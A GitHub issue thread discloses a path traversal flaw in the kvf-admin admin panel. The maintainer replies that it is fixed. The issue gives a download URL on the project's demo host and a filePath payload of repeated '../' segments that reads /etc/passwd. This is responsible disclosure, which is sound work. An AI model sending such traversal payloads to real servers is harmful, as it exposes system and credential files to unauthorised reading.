### ISSUE TITLE
kvf-admin exists any file to read

### ISSUE THREAD

**Issue by Am1azi3ng** [kalvinGit/kvf-admin#11]
### Vulnerability details
Vulnerability urL
> http://kvfadmin.kalvinbg.cn/common/download?filePath=../../../../../../../../etc/passwd
payload
> ?filePath=../../../../../../../../etc/passwd
### Vulnerability description
Any file can be read after logging in to the background，Can be used directly through the Internet, with low difficulty and great harm

**Comment by kalvinGit** [comment]
Thank you very much. This vulnerability has been fixed
